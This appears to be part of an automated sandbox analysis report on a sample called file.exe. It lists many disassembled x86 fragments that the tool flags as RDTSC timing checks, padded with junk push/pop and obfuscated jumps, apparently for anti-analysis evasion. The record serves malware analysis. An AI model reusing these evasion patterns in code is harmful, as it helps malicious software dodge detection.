Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A1B2 second address: 76A1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCA94C93E36h 0x0000000a jmp 00007FCA94C93E49h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A1DC second address: 76A1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A360 second address: 76A365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A4E9 second address: 76A4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A4EF second address: 76A500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 ja 00007FCA94C93E3Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A500 second address: 76A51F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Eh 0x00000007 push edx 0x00000008 jnc 00007FCA94618466h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A51F second address: 76A523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A523 second address: 76A527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 771F3F second address: 771F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 771F43 second address: 771F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FCA9461846Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 771F60 second address: 771F70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77204D second address: 772052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772052 second address: 772076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCA94C93E47h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772076 second address: 772093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FCA94618466h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772093 second address: 7720A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7720A3 second address: 7720A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7720A7 second address: 7720AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7720AB second address: 7720D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FCA94618473h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jo 00007FCA94618470h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77582D second address: 77584A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCA94C93E44h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 775FBE second address: 775FC3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776127 second address: 77612B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776391 second address: 776395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776395 second address: 7763AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FCA94C93E38h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BE24 second address: 77BE33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BE33 second address: 77BE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FCA94C93E3Fh 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f jo 00007FCA94C93E83h 0x00000015 pushad 0x00000016 jc 00007FCA94C93E36h 0x0000001c jno 00007FCA94C93E36h 0x00000022 jmp 00007FCA94C93E3Dh 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FCA94C93E46h 0x0000002f push esi 0x00000030 pop esi 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 705C5F second address: 705C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 705C64 second address: 705C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007FCA94C93E36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 705C72 second address: 705C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FCA94618466h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AEDF second address: 77AEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AEE7 second address: 77AEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AEEB second address: 77AEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AEF4 second address: 77AEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AEFF second address: 77AF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B2DC second address: 77B2E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B2E2 second address: 77B2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B2E8 second address: 77B2EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A987 second address: 77A990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B5B7 second address: 77B5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B5BB second address: 77B5C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007FCA94C93E36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BB5B second address: 77BB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BB65 second address: 77BB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FCA94C93E36h 0x0000000a jbe 00007FCA94C93E36h 0x00000010 jp 00007FCA94C93E36h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BB7F second address: 77BB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA9461846Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78431C second address: 784323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70272C second address: 702730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 702730 second address: 702734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 702734 second address: 70273A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70273A second address: 70274A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jo 00007FCA94C93E36h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70274A second address: 702754 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78318C second address: 783196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FCA94C93E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783196 second address: 7831A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FCA94618466h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7831A6 second address: 7831AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783587 second address: 78358D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78358D second address: 7835A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FCA94C93E42h 0x0000000b jo 00007FCA94C93E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783854 second address: 78386B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCA9461846Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72D6BD second address: 72D6C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7841A2 second address: 7841A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7841A6 second address: 7841B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FCA94C93E3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 782BC6 second address: 782BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 782BCB second address: 782BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78713A second address: 787154 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618472h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B57F second address: 78B58E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A3D2 second address: 78A3DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A3DA second address: 78A3E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7459ED second address: 72CB58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 and cx, BE19h 0x0000000e call dword ptr [ebp+122D57EEh] 0x00000014 jmp 00007FCA9461846Ch 0x00000019 push esi 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745A92 second address: 745A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745E24 second address: 745E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FCA94618476h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745E47 second address: 745E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCA94C93E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74623D second address: 746252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FCA9461846Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7463E3 second address: 746444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FCA94C93E4Ch 0x0000000b popad 0x0000000c nop 0x0000000d mov edx, dword ptr [ebp+122D394Ch] 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FCA94C93E38h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f pushad 0x00000030 add edx, dword ptr [ebp+122D19F9h] 0x00000036 mov di, AD06h 0x0000003a popad 0x0000003b nop 0x0000003c push edi 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7467A5 second address: 7467AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7467AA second address: 7467FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FCA94C93E38h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, ecx 0x00000026 sub dword ptr [ebp+122D57A7h], ebx 0x0000002c push 0000001Eh 0x0000002e mov edi, esi 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FCA94C93E49h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74693F second address: 746943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746943 second address: 746949 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746B76 second address: 746C17 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FCA94618474h 0x0000000c jmp 00007FCA9461846Eh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 jmp 00007FCA94618478h 0x0000001a lea eax, dword ptr [ebp+124776F4h] 0x00000020 and cl, FFFFFFE0h 0x00000023 push eax 0x00000024 pushad 0x00000025 jmp 00007FCA9461846Ah 0x0000002a push ebx 0x0000002b jmp 00007FCA9461846Dh 0x00000030 pop ebx 0x00000031 popad 0x00000032 mov dword ptr [esp], eax 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FCA94618468h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f jmp 00007FCA94618472h 0x00000054 lea eax, dword ptr [ebp+124776B0h] 0x0000005a movsx ecx, si 0x0000005d push eax 0x0000005e push ecx 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746C17 second address: 72D6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FCA94C93E38h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 xor dword ptr [ebp+122D17BCh], ebx 0x00000029 call dword ptr [ebp+122D1B32h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FCA94C93E45h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A87C second address: 78A893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94618473h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A893 second address: 78A89B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78ABD2 second address: 78ABD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78ABD9 second address: 78ABE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FCA94C93E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B14E second address: 78B158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B158 second address: 78B170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78F296 second address: 78F2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78F2A0 second address: 78F2A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78EE34 second address: 78EE47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78EE47 second address: 78EE51 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78EF7F second address: 78EFBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FCA94618479h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78EFBA second address: 78EFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791E0B second address: 791E10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791E10 second address: 791E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795D8F second address: 795D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795592 second address: 79559C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94C93E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79559C second address: 7955A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7955A2 second address: 7955C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCA94C93E3Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 je 00007FCA94C93E36h 0x00000016 pop ecx 0x00000017 rdtsc
